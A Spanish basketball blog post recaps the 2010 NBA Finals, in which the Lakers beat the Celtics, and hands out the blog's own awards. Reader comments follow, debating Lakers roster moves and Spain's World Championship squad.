Playoffs 2009-2010: Finales

18 de June de 2010 por MagicJohnson32

Lakers 4 – Celtics 3

“Era el mejor de los tiempos, era el peor de los tiempos, la edad de la sabiduría, y también de la locura“.

paushoutEl célebre inicio del clásico de Dickens “Historia de dos ciudades” valdría para abrir la crónica de estas Finales que anoche acabaron. Valdría, incluso, para describir una rivalidad de la que se ha escrito un nuevo capítulo para las hemerotecas. Cuando se trata de Lakers vs Celtics, el mejor de los tiempos es el peor de los tiempos: el sabio es el loco, el genio es mezquino, el torpe es el héroe, el osado es cobarde y el gigante es minúsculo. Y viceversa.

Lo hemos vuelto a comprobar: el mismo jugador que en el segundo partido lograba el récord de triples en una Finales, firmaba a continuación un 0 de 16 en los tres encuentros siguientes. El de Ray Allen es sólo un ejemplo, tal vez el más extremo de todos, pero en el que también encajarían Garnett, Kobe, Artest, Pierce o Rondo. Durante estas Finales todos han sido sabios y todos han sido locos.

No han sido, por tanto, unas series brillantes. De hecho, el factor más determinante, al menos con la estadística en la mano, ha sido el rebote: el equipo que ha dominado los tableros ha ganado siempre el partido. Así, no es casual lo que vimos anoche. Pese a unos porcentajes ínfimos, pese a la incapacidad para dar el balón en buenas posiciones a sus mejores jugadores, los Lakers resistieron durante más de tres cuartos y acabaron imponiéndose gracias a los 23 rebotes de ataque y a las 33 capturas que sumaron entre Bryant y Gasol (más que todo el quinteto céltico junto).

rayshootEl partido decisivo se jugó en la trinchera, cierto, pero también ha habido momentos para el lucimiento. Anoche sin ir más lejos, en el intercambio final de triples o  con el dominante último cuarto de Gasol. Y también en los partidos anteriores, que nos dejaron joyas como los 8 triples de Allen, los 23 puntos seguidos de Kobe, el triple doble de Rondo, el alley-oop de Pau a Shannon Brown, o Glen Davis y Nate Robinson convertidos en “Shrek y el asno”…

Decíamos que no han sido unas series brillantes. De intensidad, de grandes defensas, de ajustes y de detalles, sin embargo, han estado sobradas. Al final todo se redujo a los últimos minutos del último partido, al cara o cruz. O no. Vale la pena hacer otra lectura, vale la pena plantearse si la clave del triunfo de los Lakers ha sido su capacidad de mutación: ganaron en primera ronda a un equipo joven y entusiasta como los Thunder en una serie de anotaciones bajas; barrieron a los Jazz logrando 110 puntos por noche; ganaron a los Suns jugando, claro está, con marcadores muy elevados; y finalmente han sido capaces de remontar un 3-2 en contra (su primera desventaja en una serie desde las Finales de 2008) dejando a los Celtics en menos de 80 puntos en los dos últimos partidos.

Es decir, los Lakers, acusados con frecuencia de indolentes y blandos, han cambiado el esmoquin por el traje de faena cuando ha hecho falta, han sabido jugar en el mejor de los tiempos, y en el peor de los tiempos. Ahí reside el gran mérito de este equipo y ahí se encierra la razón para preferir a Artest sobre Ariza. Cada vez que ha habido que lanzarse al fango, Artest lo ha hecho. Para eso lo firmaron los Lakers y nadie puede discutirle que ha cumplido.

El MVP de las Finales fue para Kobe, quien pese a su desastrosa actuación ofensiva de anoche ha acabado promediando 28,6 puntos, 8 rebotes, 4 asistencias y 2 robos. Es su quinto anillo, el que le permite superar a O’Neal y a Duncan, y junto a Fisher, situarse con Magic y Kareem como los artestwheatiesjugadores que más títulos han obtenido con la camiseta de los Lakers. Gasol, por su parte, sigue haciendo historia: campeón del mundo 2006, plata en el Eurobasket 2007, finalista de la NBA 2008, plata en los JJ.OO. 2008, campeón de la NBA 2009, campeón del Eurobasket 2009 y campeón de la NBA 2010. Nadie, ningún otro jugador de baloncesto en todo el planeta, tiene un palmarés parecido al de Pau en las últimas temporadas. Y pocos ofrecen unas prestaciones como los 18,5 puntos, 11,5 rebotes, 3,7 asistencias y 2,6 tapones que ha promediado Gasol en las Finales.

Así, con la mejor pareja de la liga, con la contribución de Artest, el inmenso sacrificio de Bynum, los momentos de lucidez de Odom y las oportunas apariciones de Fisher, los Lakers se sitúan a un solo anillo de los Celtics y con las opciones intactas para lograr alguno o algunos más en los próximos 3-4 años. Habrá tiempo de analizar cómo se presenta el verano para ambas franquicias, cuestiones como las dudas sobre la continuidad de Phil Jackson y Doc Rivers, la segura operación de Bynum y la probable de Kobe, o las renovaciones de Ray Allen y Derek Fisher.

Ahora, sin embargo, es tiempo de celebración en L.A. y de resignación en Boston, escena final de un nuevo capítulo en la rivalidad deportiva más grande que ha dado el deporte americano, de la cual ambos equipos, ganadores y perdedores, pueden sentirse orgullosos. Nosotros nos sentimos afortunados por haber sido testigos.

lokbdfPREMIOS

MVP: Nos permitiremos el lujo de corregir el error de la NBA y conceder el premio ex aequo a Kobe Bryant y a Pau Gasol. Cuando no ha sido uno el que se echaba el equipo a la espalda, ha sido el otro, y con frecuencia han sido ambos. Hay sociedad para largo.

La sorpresa: El 4º cuarto de Fisher en el tercer partido y el de Glen Davis en el cuarto han supuesto las principales salidas del guión durante las Finales. La solidísima aportación de Artest en los dos últimos y decisivos partidos también merecen mención aunque sólo hasta cierto punto puede considerarse como sorprendente.

La decepción: La calidad de Lamar Odom da para mucho más que 7,6 puntos y 6,6 rebotes de media en las Finales. Por parte de los Celtics, el caso de Ray Allen y sus rachas de triples (una extraordinaria y a continuación una pésima) quedará como uno de los más curiosos de la historia.

El mayor esfuerzo en vano: Han sido unas Finales en las que nadie ha ahorrado una gota de sudor. El esfuerzo en vano ha sido por tanto el de los perdedores, unos dignísimos Celtics que pueden regresar a Boston con la cabeza muy alta pero con la inevitable sensación de haber perdido una gran ocasión. Paul Pierce, Kevin Garnett y Rajon Rondo han dejado buenos momentos de baloncesto, finalmente insuficientes ante los ya bicampeones.

Comenta

46 comentarios a esta entrada

  1. Rompe dice:
    #1

    Lakers 4 – Celtics 2, jeje

    Grandísimas finales y grandísimo blog! Enhorabuena porque lo habeis bordado! Vosotros y los Lakers!

      Citar

  2. Dantley2 dice:
    #2

    No he podido ver nada, una pena, pero algo me deja sentir tu artículo, impresionante párrafo inicial.

    Enhorabuena amarillos del blog ¡¡¡

      Citar

  3. Txusma dice:
    #3

    Muy bien, ya lo hemos celebrado. Ahora a por el MVP…
    He visto un resumen del partido y de nuevo, me ha hervido la sangre al ver el infame partido de Kobe Bryant. Ya puede Kobe darle todas las gracias del mundo a Gasol y Artest, principalmente, pq si ayer los Lakers pierden finalmente el partido en los últimos segundos se merecería ser crucificado por las críticas. Ya no hablo de sus tres primeros cuartos horribles con tiros y tiros con dos tios encima y absurdas pérdidas de balón. Hay un par de jugadas la mar de representativas: su primer tiro en el primer cuarto el q recibe el balón cuando faltan 13 segundos y defendido por Allen empieza a escorarse hacía la esquina. Los Celtics se cierran y Artest y Fisher están abiertos en el triple totalmente solos. Pierce se dirige hacia Kobe para hacer el dos contra uno y Kobe es incapaz de doblar el balón y no creo que sea por que no sabe hacerlo… La siguiente la última del final cuarto en el q a falta de 10 segundos ya tiene la bola y se escora hacía la otra esquina y acaba tirando con 2 tios encima y casi ninguna posibilidad de acertar…
    Pero es q en el último cuarto creo que estuvo a punto de cargarse la remontada a pesar de anotar 10 puntos (8 de tiro libre, ahí indiscutible su sangre fría). A falta de 44 segundos y con Lakers 3 arriba, recibe el balón a falta de 17 segundos y bota, bota, bota hasta q decide jugarse el triple de casi 8 metros. Suerte que Gasol recoge el rechace pq si no lo hace a lo mejor estaríamos hablando de otro final. Y bueno, un pelín más y Kobe acaba haciendo falta en ataque en esa jugada… Desesperante para mí. No sé para los amarillos…

      Citar

  4. Love Denise dice:
    #4

    lo que le pasa a Bryant es que no ha aprendido a ser generoso, es egoista y quiere ser el centro de atencion, y mas aun en el partido decisivo prefiriendo tirarse tiros mal seleccioandos y con 2 tios encima antes que pasarla a un compañero solo. Se ha comprobado que cuando Bryant se dedica a asistir, los Lakers juegan mucho mejor, pero ayer quería lucirse y lo unico que hizo fue cagarla una y otra vez excepto al final.
    Creo que Si ayer Bryant hubiese metido 60 puntos con buenos porcentajes pero los Lakers hubiesen perdido, el se hubiera marchado contentisimo a casa.

      Citar

  5. José Ángel Colomés dice:
    #5

    Me parece un análisis sensacional y la frase del principio muy adecuada, brillante. Sí, ha sido una final grande en todos los sentidos. Una final de esencia, una final para el recuerdo.

    Saludos desde NBA conexión

      Citar

  6. Love Denise dice:
    #6

    A pesar del titulo, creo que la plantilla de Lakers podria ser mejorable, voy a hacer de Kupchak y yo haría los siguientes cambios:
    – Devin Harris x Odom
    – Renovación de Fisher
    – Vujacic (que al ser expiring interesa a cualquiera) x Brandon Bass
    – Como agente libres, ficharía a Brad Miller, cuya prioridad supongo que ya no será el dinero y creo que estaría encantado de venir a Lakers, vivir en L.A y tener oportunidad de ganar algo. Por 2 milloncetes creo que te lo podrías traer y daría buenos minutos de descanso a Pau y Bynum
    – Ficharía como agente libre a Joey Graham y Rodney Carney, por un miloncete a cada uno
    – Intentaría trasapasar a Walton, pero con lo paquete que es, entiendo que es intraspasable, nadie lo querrá.

    Por tanto me quedaría este equipo
    Titulares: Harris / Bryant / Artest / Gasol / Bynum
    Rotacion: Fisher / Brown / Carney / Graham / Bass / Miller
    Fondo de armario: Walton / Mbenga.

      Citar

  7. Adgaor dice:
    #7

    Nose, dudo que los Nets aceptaran ese traspaso. Lo que seria ideal es lo que has dicho de Brandon Bass.

    Yo me centraria en:
    -Vender a Farmar. No me gusta nada el juego de este tio.
    -Renovar a Fisher. Haría la función de segundo base y de lider del vestuario.
    -Fichar a Steve Blake. Para mi és un base perfecto para los lakers, buen tirador, buen defensa y acostumbrado a jugar con una estrella en el puesto de escolta.

    No obstante, dudo que el año que viene repitan anillo, principalmente por Artest. El fué a los lakers a ganar un anillo, ahora ia lo tiene. Este año a tragado con mucho para conseguirlo (ver reducida su estadistica, su salario, convertirse en un niño bueno,…). Nose, no lo veo que le interese tanto tener un segundo anillo. Ojala que me etivoque.

      Citar

  8. Viva_Dirk dice:
    #8

    Lo de Devin Harris no va a pasar, los Lakers no quieren un base de ese corte, ni con Phil ni sin Phil. Ni creo que podamos mover el contrato de Vujacic.

    La opción de Brad Miller si la veo posible siempre que este dispuesto a cobrar como mucho la bianual.

      Citar

  9. Love Denise dice:
    #9

    yo creo que al que no se puede mover es a Walton que le queda una barbaridad por cobrar, pero Vujacic es un expiring apetecible, además siendo su ultmo año de contrato, seguro que en la siguiente temporada le echa mas ganas que en estos ultimos años.
    por cierto, ha muerto Manute Bol RIP

      Citar

  10. Txusma dice:
    #10

    Iba a comentar lo mismo. Harris no acaba de pintar en un equipo como los Lakers donde el base lo único que ha de hacer es anotar una canasta cada año en un partido de Playoffs… Y para eso, Fisher sigue siendo de lo mejorcito, para que negarlo. Eso sí, un tio como Blake para repartirse los minutos y poder defender en condiciones no les vendría nada mal.

      Citar

  11. Love Denise dice:
    #11

    ten en cuenta que los lakers estan jugando estas 3 ultiams temporadas mas de 100 partidos al año.
    y el año que viene Fisher tendra otro año más, y farmar me parece un bluff. En mi opinion, como ejemplo, harris sería un jugador adecuado para Lakers, allá ellos. pero yo no me la jugaría otro año mas con Fisher y Farmar.

      Citar

  12. sergio dice:
    #12

    Para mi la continuidad de Fisher es de perogrullo.. estoy practicamente seguro de que si hacen unos cuantos fichajes de cara a mejorar la plantilla no le importaría renovar por el mínimo salarial. Que su rendimiento no sea el adecuado en la regular no me parece especialmente significativo.

    Los dos jugadores que terminan contrato el año que viene (Morrison y Farmar) deberían salir del equipo. Shannon Brown tiene una opción personal de renovación. Blake el año que viene se queda sin equipo asi que dependiendo de las ofertas (no creo q muchos equipos le ofrezcan los 5 kilos que casi cobra este año) podría ser una opción interesante. A mí la que más me sigue convenciendo es la Kirk Hinrich pero los 9 millones del año proximo me parecen excesivos a todos los niveles. El cambio Vujacic-Bass me parece muy bueno pero dudo que los Magic deseen un jugador de perfil similar a JJ Redick.

    Deberían reforzar el puesto de base y algun jugador alto (preferiblemente con experiencia y no muy dado a las lesiones). Me parecen buenas opciones el mencionado Blake, Ridnour (libre), Afflalo (expiring 2011), Brendan Haywood o David Lee (puestos a soñar y dependiendo de los fichajes…). También los mencionados Bass y Miller si cumplen ciertas condiciones de salario. Algunos planes mas arriesgados o improbables: Jason Thompson, Roy Hibbert, DeAndre Jordan, Kurt Thomas, Tyrus Thomas, Ilyasova o Scola (no se si ha renovado.. pero me suena)

    Pero que vamos, que todo lo que digamos son conjeturas hasta que no se concreten los equipos de los grandes agentes libres y se comprueben los descartes. Además, este año puede haber cierre patronal para negociar el contrato colectivo de trabajo que seguramente sea a la baja al igual que el maximo salarial de cada equipo. No olvidemos que los Lakers pueden quedarse sin posibilidades de fichar agentes libres excepto por alguna de las conocidas excepciones (minimo, mid-level,….)

      Citar

  13. Love Denise dice:
    #13

    son conjeturas, pero como ya acabo la temporada, pues habra que pensar en algo:)
    el vujacic-bass que propuse lo hice pensando en los 2 equipos. Yo creo que sería conveniente para los dos. Para lakers, a nivel deportivo, y para los Magic a nivel económico consiguiendo un buen expiring a cambio de un jugador que no cuenta y que tiene por delante a Lewis y a Anderson, vamos que los Magic tienen overbooking en el puesto de 4.
    Ademas, tratandose del ultimo año de contrato del esloveno, estoy seguro de que el año proximo le echará mas eggs.

      Citar

  14. Txusma dice:
    #14

    Yo lo q no entiendo es para que narices fichan los Magic a Brandon Bass a razón de 4 millones por temporada si después no lo hacen jugar… Inexplicable.

      Citar

  15. Love Denise dice:
    #15

    es inexplicable, si, pero en todos lados cuecen habas, muchos equipos tienen jugadores en situaciones similares, quizas si V Gundy se va, el nuevo entrenador lo utilice más, particularmente, me gusta bastante este jugador, no es una estrella, pero si un buen suplente de garantias.

      Citar

  16. TheDeerHunter dice:
    #16

    Yo puestos a soñar me quedaría con lo mejorcito de varios rumores que han sonado en algún que otro momento durante los últimos tiempos:

    Bases: Hinrich, Fisher, Brown
    Escoltas: Kobe, Vujacic
    Aleros: Artest, Walton
    Interiores: Gasol, ¿Bynum/Odom?, Bosh y…. SHAQ (si alguien/Phil le convence para otro año más)

    Siendo más realista, creo que Fisher, Kobe, Artest y Gasol son intransferibles; Bynum, Odom y Brown seguirán siendo aprovechables y Walton y Vujacic transferibles, aunque el expiring que comenta Love Denise de Vujacic entiendo que lo aprovecharán los Lakers al final de curso.

    Se irán Farmar, Morrison, Powell y Mbenga, con todo el dolor de mi corazón. Yo también hubiera apostado por ellos en su momento… y en este caso hubiera perdido.

    De los nombres que habéis mencionado Blake me parece buena opción… aunque dudo muy mucho que venga por el mínimo.

      Citar

  17. TheDeerHunter dice:
    #17

    Ah… y otra gran noticia: el GM Wallace renueva por los Grizzlies

    y ya que estamos para “avivar” algo el fuego (y nunca mejor dicho): dicen que Iverson quiere volver otra vez… igual no le importa fichar por el mínimo en algún equipo con aspiraciones de anillo XD

      Citar

  18. Love Denise dice:
    #18

    El CB Murcia anda buscando un base, sería una buena opción para Iverson. Seguro que tendría credito para tirarse sus 25 tiros y anotar todo lo que qusiera.

      Citar

  19. Love Denise dice:
    #19

    y sobre el Mundial de baloncesto, cuando da USA la lista de jugadores que van a ir?

    en el caso de España, yo llevaría a estos 12
    B: Calderon, Ricky
    E: Navarro, Rudy, Llull
    A: San Emeterio, Mumbru
    P: Marc, reyes, vazquez, Garbajosa y Sonseca
    una rotacion de 10 tios excepto Mumbru y Sonseca que jugarian los minutos de la basura, o por probelmas de faltas…

    pero yo creo que Scariolo llevará a Cabezas y a Claver, espero que no lleve a Berni por muy amigo suyo que sea

      Citar

  20. sayim dice:
    #20

    Bastante de acuerdo con la lista para el mundial, salvo por una cosa: si este año finalmente no va Carlos Suarez a la selección, debería hacérselo mirar el italiano… No quiero exagerar, pero para mi es un Top5 en el puesto d 3 en Europa. POr lo demás quizá me sobren Sonseca y Mumbrú.

    En lo de Lakers, solo una reflexión: No deberían intentar reforzarse los otros equipos para batir al bicampeón. Yo no veo la necesidad de Lakers de hacer movimientos tan radicales (odom,bynum…)
    Yo creo que mientras en el juego interior tengan a Odom, Gasol y un Bynum sano y por fuera tengan a Kobe y Artest son máximos favoritos al anillo.

    Y Vujacic deberían mantenerlo, al fin y al cabo le dieron el balon cuando mas quemaba para asegurar el anillo (HASTA DEER DIJO VUJACIC MVP!!!!). No me parece que Vujacic cobre mucho, con lo seguro q estuvo desde la linea con toda la presion encima….

    Un saludo

      Citar

  21. TheDeerHunter dice:
    #21

    jajaja, sayim… no me líes

    vujacic cobra 5 kilos por año… y viendole la carita que ponía estaba seguro que iba a fallar

    por suerte no lo hizo… clutch time vujacic

    al menos sí reconozco que ha hecho una última serie digna para lo poco que le ha tocado entrar… mucho más de lo que se puede decir de cualquier actuación desde la final del 2008

      Citar

  22. pablito dice:
    #22

    Los lakers han de quitarse del medio a Odom y canjearlo por un buen jugador interior que cubra las lesiones de Bynum y dé descanso a Pau.

    Fisher sólo se puede quedar de base suplente, es demasiado flojo para una temporada, aunque en momentos importantes se crezca.

    Vujacic no se merece más oportunidades y de los suplentes el único que se salva es Brown.

    De la lista que proponeis estoy de acuerdo en que Mumbru y Sonseca sobran y que Carlos Suárez ha de estar, es el heredero natural de Jiménez por casta, con la diferencia de que el nivel es ahora mayor.

    Juan Luis Guerra acaba de decir en Buenafuente que es esguidor de los Celtics. Este año casi ha llovido café en el campo…

    Enhorabuena a los fanes de los Lakers

      Citar

  23. Fer dice:
    #23

    Hola chicos,
    respecto a la selección, estoy de acuerdo con LDenise…dentro Carlos Suárez por Mumbrú y listo.
    y en cuanto a mis Lakers, yo tbn pienso que se podría hacer algún cambio.
    Por ejemplo, Collison y Okafor por Odom y Walton. Ellos se comen el contrato de Walton y nosotros el megacontrato de Okafor y adquirimos a un pedazo de base como Collison, rápido para defender a tipos como Westbrook y no mal tirador.
    Luego tenemos la biannual y la MLE para fichar buenos reservas, más Fisher renovando por el mínimo para veteranos, Mbenga y Powell renovando tbn por el mínimo para ser 11 y 12 de la rotación. Y ya si algún veterano tipo T-Mac, Jermaine O´Neal quisiera firmar por la biannual para liderar el banco junto a Fish y la MLE la gastamos entre Mike Miller
    Collison/Fisher
    Kobe/Brown/Vujacic
    Artest/Mike Miller
    Pau/O´Neal/Powell
    Bynum/Okafor/DJ

      Citar

  24. TheDeerHunter dice:
    #24

    Según el LA times los Lakers no tienen previsto utilizar la mid-level.
    Todo gira en torno (cómo no) a la continuidad de Jackson. Fisher seguirá con sus 5 kilos por un año más y se supone que Shannon Brown también seguirá (siempre que no haga efectiva su player option para subirse a la parra)
    A Farmar no tienen intención en retenerlo, lo mismo que a Morrison, Powell y Mbenga.

    Como se ha mencionado por aquí, el interés estaría en Blake o si falla en Ridnour o Earl Watson… pero como digo sin la mid-level de por medio. Además se añadiría un interior veterano por el mínimo (1,325 kilos $ para un jugador de +10 años de experiencia) También he leído el rumor de McGrady, por el mínimo también.

    El proyecto campeón lo tienes. Por mucho que todo el mundo lleve sacándole punta al equipo hasta lo irracional desde hace 3 años.

    Decir que los anteriores proyectos campeones amarillos contaban a los siguientes ilustres entre sus filas:
    – 2000-02: Marc Madsen, Samaki Walkers, Jelani McCoy, Fox, Lindsey Hunter, Richmond (acabadísimo), Devean George, Isiah Rider (acabadísimo), Medvedenko, Greg Foster, Mike Penberthy, John Sally, John Celestand…

    – 1979-87: Jeff Lamp, Milt Wagner, Wes Matthews, Billy Thompson, Ray Tolbert, Mike Smrek, Tony Campbell, Adrian Branch, Franck Brickowski, Chuck Nevitt, Ronnie Lester, Larry Spriggs, Earl Jones, Mike MgGee, Kevin McKenna, Jim Brewer, Mark Landsberger, Clay Johnson, Jim Chones, Butch Lee, Ollie Mack, Marty Byrnes, Brad Holland, Don Ford, Kenny Carr, Ron Boone…

    Paquetones los hemos tenido toda la vida… imaginad el resto de equipos.

      Citar

  25. Txusma dice:
    #25

    Samaki Walker era un clarísimo 20-10 para la ACB. No, Magic? Pedidle que os cuente la historia 😀

      Citar

  26. MagicJohnson32 dice:
    #26

    Los detalles sobre lo de Samaki Walker sólo se cuentan en petit comité, jeje, pero bastaría con decir que su agente se metía drogas muy duras para decir las cosas que decía, jajaja…

      Citar

  27. CAMPO2 dice:
    #27

    Entonces lo que los lakers necesitan es algun veterano para que comande mejor la segunda unidad, imaginaros que por el minimo fichasen a T-Mac, Shaq, Iverson todos ellos con ganas de ganar un anillo o pasar aunque sea una primera ronda de play-offs y que no se nos olvide que hace un año mas o menos habia un jugador que retransmitia su vida por internet y que decia que se tomaba un año sabatico y luego volveria con mas fuerza, estoy hablando de Marbury yo creo que estos cuatro acaban con la paciencia de cualquier maestro Zen y las horas de psicologo de Ron se irian por el retrete.

    Eso si sería entretenido

      Citar

  28. carlisfrin dice:
    #28

    buenos dias!
    Porque tanto empeño en que odom salga del equipo?odom es un tio que hace mucho banquillo y es generoso jugando,en cambio devin harris es muy joven y seguro que la liaria mas en el vestuario laker.Ademas su contribucion en la cancha como 6ºhombre es muy notable,como sino han ganado el titulo los lakers?si jugasen solo los titulares habrian tenido problemas incluso para entrar en playoffs.Este año ademas ha mejorado mucho su tiro exterior y eso le hace mas peligroso que el año pasado.Odom es un crack desde el banquillo y encaja perfectamente en el juego que propone phil,el tema de farmar,vujacic y walton ya es distinto porque ellos si que no aportan practicamente nada pero no olvidemos que este equipo ha sido el mejor de esta temporada y eso no se consigue solo con pau y kobe,el equipo es un grupo muy unido que tiene una base de jugadores (luke,odom,farmar,sasha) que llevan ya unos cuantos años juntos y si se les cambia puedes cargarte la confianza de otros jugadores importantes.
    En definitiva creo que debe cambiarse esa base de la que hablo pero poco a poco,y empezando por los que menos aporten,y odom es el que mas aporta desde el banco.
    Un saludo!

      Citar

  29. TheDeerHunter dice:
    #29

    buenas carlisfrin
    el problema de odom no es tanto que sea el que más aporte del banquillo, es que cobra más de 10 kilos por año y no es en absoluto consistente. Te puede hacer un gran partido o se puede hundir al primer problema que surja y eso es absolutamente incompatible con su estatus en el equipo pero más todavía con su potencial y talento.
    Este año, por desgracia, ha sido más lo segundo que lo primero… y tampoco sé de donde te sacas que ha mejorado su tiro exterior cuando es todo lo contrario y cada año que pasa lanza peor.
    De los 14-10 que se hacía la primera temporada con Gasol pasó a los 12-9 en la anterior (aunque con alguna que otra serie acojonante) hasta los 10-8.5 de ésta… con apenas algún partido brillante y disfrutando de muchísimos minutos. En playoffs no podemos decir que haya sido reserva propiamente dicho.
    Lo peor de todo es que es de los que más se dejan llevar… y a mí particularmente es el que más me preocupa a la hora de encontrar hambre con dos anillacos en los dedos.
    Con todo, estoy de acuerdo conque parte de culpa tiene de que se haya alcanzado el título… y en los últimos dos partidos apretó en defensa por lo menos.

    En otro orden de cosas se lee por ahí que los Lakers van a por Raja Bell. Sería un fichaje muy interesante y perfectamente coherente con la ideosincrasia del equipo… no tengo muy claro cómo afectaría al tema Shannon Brown cuya situación cada vez me parece más complicada. De Vujacic ya ni hablamos, lógicamente.

    Además, la hija de Phil Jackson ha declarado que no cree que su padre continúe en el equipo. Creo que sería una noticia terrible para los amarillos.

      Citar

  30. Love Denise dice:
    #30

    Campo2, de verdad ficharias a TMac, Shaq, marbury e Iverson. pero si elq ue no esta acabao es problematico,o ambas cosas, eso seria una jaula de grillos.

    yo lo que creo es que los Lakers necesitan un cuarto hombre interior de garantias, y si tienen que reforzar el equipo mediante traspasos, creo que la principal moneda de cambio es Odom.

    me gusta la lista de Scariolo, sin cabezas, berni, s.rodriguez. Solo me falla el paquete de claver, y entre san emeterio y suarez, prefiero al del tau

      Citar

  31. TheDeerHunter dice:
    #31

    El “paquete” de Claver ha ganado algún título este año… y algún premio individual también.
    Desde luego que se merece más ir que algún otro jugador nada paquete… y por potencial (y realidad) es puesto fijo en esta selección y en las del futuro. Al tiempo.

    No obstante se seguirá echando de menos durante mucho tiempo al que otrora muchos llamaban “paquete” Carlos Jimenez.

    Muchos yogures van a tener que comer San emeterio y suarez para llegar a las suelas de sergio, cabezas o berni de lo que han sido ellos para esta selección en los últimos años. Ójala sean tan buenos elementos como lo han sido los otros.

      Citar

  32. Txusma dice:
    #32

    Bueno, para igualar a Sergio sólo hay que hacer un buen partido. Eso sí, en unas semifinales del Mundial.

      Citar

  33. Love Denise dice:
    #33

    lo mismo de siempre. Claver podrá quizas ser bueno, hoy en día deberia ser el jugador nº12 de la selecc ( y personalmente yo ni le llevaba), tiene potencial, si, y quizas dentro de un par de años sea bueno, hoy en dia, esta verde, al menos para mi.
    muy bueno, txusma, sergio hizo unos minutillos buenos vs argentina y quedo endiosado.

      Citar

  34. Viva_Dirk dice:
    #34

    Minutillos dice, lo que hizo fue resolver el partido. Y hacer unos últimos play-offs buenísimos en la ACB. En cuanto a Claver, debe estar y seguramente ser el futuro alero de la selección.

      Citar

  35. Love Denise dice:
    #35

    unos ultimos playoffs buenisimos?? perdona, no tengo mucho tiempo para contrastarlo, pero si mi memoria no me falla (que podria hacerlo), el estu fue barrido 3-0 por el unicaja (que acabo ganando la Liga), 2 de los 3 partidos de paliza (sino los 3), y con sergio maquillando enormemente sus estadisticas, creo recordar que estuvo bastante bien desde el triple, pero muchos de sus puntos ya no servian para nada.
    y de resolver el partido vs argentina nada de nada, unos minutillos buenos con un par de triples y punto, a ver si ahora cualquiera que mete un par de triples ya es un crack, y que sobre el partido vs Israel en el Europeo 2007, en el que salio de titular y a los 5 minutos españa perdia de 10 puntos, gracias, en parte a sus fallos?, y cosas como esas muchas, en la NBa y afortunadamente, pocas en España ya que no ha jugado mucho.
    Claver podrá ser el futuro, pero ahora mismo es un jugador mediocre y no resolutivo , al contarrio, por ejemplo de llull.

      Citar

  36. CAMPO2 dice:
    #36

    Hombre Love Denise, no quiero a ninguno de ellos ni en mi equipo en una pachanga, veteranos por el minimo se habla de Raja Bell que digamos que si es un tio profesional y si que necesitarian mas rotación interior de garantias del estilo A, Mcdyes(no se muy bien como se escribe)

      Citar

  37. TheDeerHunter dice:
    #37

    @LDenise: Tú dices mediocre y no resolutivo y yo digo una de las perlas más cotizadas de europa por méritos propios. Me temo que está muy claro quien de los dos se acerca más a la realidad.
    En realidad siendo coherente con tu criterio ni Sergio ni Marc hubieran calzado en su día la zamarra roja en Japón y España no hubiera sido campeona del mundo. Incluso Pelé tendría algún mundial menos en su haber…

    Lo de reducir lo de Sergio a un par de triples contra Argentina me suena a broma… pero si es en serio me parece impresionante que te deshagas en elogios con chusma inoperante como Barnes y no sepas ver lo que ya han hecho y han demostrado otros con un talento infinito en comparación. Será que el criterio va precisamente en esa línea… llegar a unas semifinales y desaparecer como el humo. Esos serán los buenos para ti, entiendo.
    Los otros, sin embargo, ganan títulos porque son capaces de sacar algo que se llama talento baloncestístico en los momentos decisivos. Es de lo que se trata, me temo. Algunos tienen de eso y otros no. Es así de sencillo.

      Citar

  38. Txusma dice:
    #38

    La discusión sobre Sergio es ya eterna. En la NBA ha ido un incomprendido, injustamente maltratado por los 3 entrenadores que ha tenido… Vamos a ver con Messina en el Madrid que hace. Y es q hay veces q tan solo con talento no se puede vivir.

      Citar

  39. TheDeerHunter dice:
    #39

    Los críticos con él os agarráis a una falacia como a un clavo ardiendo.
    La falacia es que alguien haya criticado a todos los entrenadores por no utilizarle. Yo sólo he observado criticar a McMallon, y no sólo por el caso de Sergio, aunque en su caso sí es demostrable lo injusto que se fue con él, por varios motivos que no voy a repetir.

    Westphal ha sido en todo momento justo y coherente. Me parece comprensible y respetable (esté o no de acuerdo) que Udrih estuviera por delante en la rotación y más si Udrih juega al nivel que ha llegado a desplegar este año. El problema para Sergio ha sido Tyreke Evans jugando muchos minutos de 2 y de 1 y la existencia de Martin. Son dos jugadores con un grandísimo talento. No hay nada que reprochar.

    La situación en New York también ha sido muy especial y muy concreta. Podríamos hablar mucho de ella pero le toca muy de pasada a Sergio (al menos de momento) Si en algo se le criticará próximamente a D’Antoni no tendrá nada que ver con el caso de Sergio.

    Por último, está claro que en los USA hay virtudes que se valoran por encima de otras y no siempre prevalece el talento. Sin entrar en comparaciones directas allí he visto fracasar a gente como Djordjevick o como Jasikevicius. A mi modo de ver eso no les resta ni un puñetero ápice a la infinita consideración que tengo de ellos como dos de los mejores bases que he visto en mi vida.
    Salvando las distancias lo aplico al caso de Sergio… y también digo que mi apuesta por él es una apuesta segura, lo dejo aquí por escrito. Queda muy poco para empezar a cobrarla.

      Citar

  40. Love Denise dice:
    #40

    “”Los otros, sin embargo, ganan títulos porque son capaces de sacar algo que se llama talento baloncestístico en los momentos decisivos””

    oh si, cuantos titulos tiene sergio, ahh si el Mundial gracias a Pau, garba, Navarro, rudy, calderon ,…..así tambien gana cualquiera un mundial, yendo de nº12 rodeado de jugones.

      Citar

  41. Love Denise dice:
    #41

    y no vengais ahora con lo del Mundial sub 19 blal bla bla, que los titulos se ganan entre mayores, los titulos junior no valen para nada, cuantos jugadores en baloncesto, o en futbol, o en lo que sea se salen a los 18 años compitiendo contra gente de su edad, y al pasar a profesional no se come un rosco.

      Citar

  42. Txusma dice:
    #42

    Es lo q digo, Deer. Que ahora podremos ver realmente al verdadero Sergio y podremos comprobar si los años en la NBA le han sentado bien. De momento podemos decir sin ningun atisbo de duda que ha fracasado en su periplo americano pero estoy de acuerdo en que no por eso ya hay que crucificarlo. Para mí, Bodiroga tb fue de lo más grandes aunque nunca cruzó el charco.

      Citar

  43. Love Denise dice:
    #43

    y lo de comparar a Barnes con sergio, pfff, sin palabras, solo digo que ya lo quisieras tu en los lakers y no a algunos de los pedorros que teneis en el banco

      Citar

  44. TheDeerHunter dice:
    #44

    Los pedorros que hay en el banco de Lakers son todo pedorros con anillos. Pedorros que te hacen un +30 en un 6º partido de la final, o que te meten dos tiros libres sin fallo al tocar por primera vez el balón en los segundos finales de uno de los partidos más exigentes psicológicamente hablando de la historia de las finales.
    Y la comparación que hubo entre Artest y él al principio de los playoffs ni la menciono, porque aquí no hay debate que valga. Esa debería de ser la comparación correcta, porque Barnes se supone que era titular en su equipo… pero lo cierto es que en finales de conferencia se demostró dónde estaba su sitio y desde luego que no es arriba de ningún pedorro del banco de L.A.
